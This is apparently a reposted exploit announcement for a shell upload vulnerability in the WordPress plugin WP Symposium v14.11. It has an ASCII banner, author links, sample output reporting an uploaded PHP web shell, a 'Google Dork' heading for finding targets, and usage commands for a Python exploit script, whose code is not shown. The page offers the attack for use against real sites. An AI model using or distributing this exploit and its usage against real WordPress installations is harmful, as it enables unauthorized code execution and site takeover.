___ ___ __
| Y .-----.----.--| .-----.----.-----.-----.-----.
|. | | _ | _| _ | _ | _| -__|__ --|__ --|
|. / \ |_____|__| |_____| __|__| |_____|_____|_____|
|: | |__|
|::.|:. |
`--- ---'
___ ___ _______ _______ __
| Y | _ |______| _ .--.--.--------.-----.-----.-----|__.--.--.--------.
|. | |. 1 |______| 1___| | | | _ | _ |__ --| | | | |
|. / \ |. ____| |____ |___ |__|__|__| __|_____|_____|__|_____|__|__|__|
|: |: | |: 1 |_____| |__|
|::.|:. |::.| |::.. . |
`--- ---`---' `-------'
Wp-Symposium
Sh311 Upl04d Vuln3r4b1l1ty
v14.11
Written by:
Claudio Viviani
http://www.homelab.it
[email protected]
[email protected]
https://www.facebook.com/homelabit
https://twitter.com/homelabit
https://plus.google.com/+HomelabIt1/
https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww
[!] Shell Uploaded
[!] Location: http://10.0.0.67/wordpress/wp-content/plugins/wp-symposium/server/php/IdqxLEKxLh5n.php
Google Dork WordPress Wp Symposium
Download
Download Exploit: HERE
Exploit Usage
claudio@backbox3:~$ python wp_symposium_1411_shell_upload.py -t http[s]://localhost[:PORT] -f filname
python wp_symposium_1411_shell_upload.py -t http[s]://localhost[:PORT]/basedir -f filename